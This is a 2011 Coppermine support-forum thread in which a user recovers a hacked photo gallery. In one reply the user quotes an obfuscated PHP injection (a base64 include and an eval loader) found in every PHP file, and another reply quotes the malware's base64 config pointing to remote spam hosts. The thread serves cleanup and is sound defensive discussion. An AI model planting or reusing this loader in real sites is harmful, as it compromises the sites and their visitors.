cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.

Error Upgrading hacked gallery 1.48 to 1.5x

Error Upgrading hacked gallery 1.48 to 1.5x
« on: January 24, 2011, 09:37:07 pm »

I got the gallery (adminname and PW) half year ago, because the old admin could no longer do this and no one cared about it.
I could not login to the admin-site. All picture and Albums have been there, but trying to login failed, due to the missing website. The URL was just gone. Tried to get support from hoster via email, no success. CPG was pretty new for me.
Now a month ago, also the whole gallery could not be opened: access denied...
calling the hosting-company, he told me it might be hacked, I should reinstall the gallery.
So I did. I still need the 2000 photos in about 20 Albums. On phpMyadmin it ist still available in Database. via FTP I did a backup of the folders of CPG148.

I followed Instructions on Upgrading from 1.4x to 1.5x.
(I was not able to identify running plugins or bridges)
put CPG folder via ftp on htdocs\cpg148 except \albums and \ and ran update.php.
now, when starting I got following message: "fs: 254847 [need: 254668]". What does that mean?
So I tried to run install.php. I had to delete
Although It told me to set register_globals=off. the host-Company I will call tomorrow for this.
I put back from the broken DUMP. but the error is the same.

At least I can not access the structure of 2000 Files and Albums. the backedup files without the structure are useless.
i would like to recreate the existing structure of the broken CPG 1.48 on a safe new CPG 1.5x. Any Idea???
If Any information is missing, I'll try to find it.

Addittionally I setup an install of cpg 1.5x on a separate folder.
working fine. Maybe moving appropriate folders might help? copying the old \albums to the new \albums gave no success. Even not using the old

Thx in advance

Joe Carver

Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #1 on: January 25, 2011, 12:40:38 am »


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #2 on: January 25, 2011, 12:17:01 pm »

See the thread: Yikes, I've been hacked! Now what?
Thank you very much, Joe!
While following all the steps in sanitizing my gallery folder, I recognized this one line in every 1st line of all *.php-files inside the top- and sub-folders. e.g. anycontent.php, config.php,...
"<?php /* <!-----hkycbJXRsBrtlTUKYvpF-----> */ $LjbMUSesTdur = base64_decode("JSVQQVRIJSUvJSVBRERQSFAlJQ==");  @include_once $LjbMUSesTdur;/* <!-----hkycbJXRsBrtlTUKYvpF-----> */?><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWIvMS8wMDAvMDQzLzc3MC8xNjQwMTIvaHRkb2NzL2NwZzE0OC9hbGJ1bXMvdXNlcnBpY3MvMTAwMDEvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

I am not very familiar with php programming, but this line seems to be unusual there. Is this correct? Might this be the reason for my Problem? Or has this line no effect?
I have to decide, whether to clean all infected files (takes time) or to delete them. but I don't know if the Gallerystructure will be damaged by deleting all the files.


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #3 on: January 25, 2011, 12:35:45 pm »

In case I have to decide for manual cleanup of every file, I have to clean the following. see attachment. But for me, most of these files in top-folder *\cpg148 (which is used here as working directory) seem unknown.
I dont know, whether these files are results of installed plugIns or bridges. I got the gallery as it is. Hacked! So probably some file have been put there by an intruder.
Should I just compare the folder with an actual 1.52 folder and delete all the unknown files listet in "WinMerge" (see attachment)???


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #4 on: January 25, 2011, 01:16:12 pm »

there are also unknown files in *albums\userpics\10001 (see attachment)! I will also delete them cause they look malicious
bi- file is a list of IP's.
cnf- file has following line: HR0cDovL3Vyb2R0ZHMud3MvaW4uY2dpPzIyJnBhcmFtZXRlcj0ka2V5d29yZCZzZT0kc2Umc2VvcmVmPSVyZWYlJkhUVFBfUkVGRVJFUj0lc2VsZl91cmwlJmRlZmF1bHRfa2V5d29yZD0la3cl"
ZGdzdQ== = "aHR0cDovL3Vyb2R0ZHMud3MvaW4uY2dpPzcmcGFyYW1ldGVyPSVrdyUmSFRUUF9SRUZFUkVSPSVzZWxmX3VybCU="
ZGd1aA== = "aHR0cDovL25vbXNhdDIyLm5ldC87aHR0cDovL25zc2F0Mi5jb20vO2h0dHA6Ly93cGxzYXQyMi5uZXQv"
ZGd0 = Mg==
cHJs = MA==
c3Q= = "UEhOMGVXeGxQaU5pZEhSa0lIdHdiM05wZEdsdmJqcGhZbk52YkhWMFpUdHZkbVZ5Wm14dmR6cGhkWFJ2TzJobGFXZG9kRG93TzNkcFpIUm9PakE3ZlR3dmMzUjViR1UrUEdadmJuUWdhV1E5SW1KMGRHUWlQZz09"
bGJw = Mg==
ZGdibG8= = MQ==
ZnJi = MA==
ZGdzcg== = MQ==
ZGdzdA== = MjQ=
ZnI= = MA==
a3dy = MQ==
ZGd0aGVtZQ== = "Z29vZ2xlX3RyZW5kcw=="
Z2M= = ""
Z2Q= = MzA=
bWw= = NTA=
YXA= = "L2NwZzE0OC9pbmRleC5waHAv"
c2Rs = MA==
Z3o= = MA==

csi-file: "|1273941107"
kwd-file: "prom hairstyles"
lb-file: empty
lock-file: empty
rlf-file: 15-05-2010 - 126-12-2010 - 1
skwd-file has list of keywords like this: "tramadol

swf-file: "CWS     xmNQUP9+'ġ0-u:$\p镗sC+&uJd;Y+ Gгa4jhzYy=L*|ChAB h 3u:M !D8BV9F/9A8E׉
"x= G,@R&W
\YaEzM~d!6<1<30}D^JFM/J2f;7}B&MOˌe`̙>/ /J,,+ʚal<6Qռ}


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #5 on: January 25, 2011, 02:24:57 pm »

I have to decide, whether to clean all infected files (takes time) or to delete them. but I don't know if the Gallerystructure will be damaged by deleting all the files.
Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #6 on: January 26, 2011, 10:25:49 am »

Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).
Yes, so I did.
After sanatizing der hacked gallery following instructions from here:,51927.0.html Yikes, I've been hacked! Now what?,
and Upgrading the cleaned Folder folliwing instructions from here:,

I have all the Folders an Photos (the structure) available again. Still need to harden the gallery against new attacks.
5 Hours santizing time saved me abaout 10 days of creation time for a new structure.
Thank you very much.

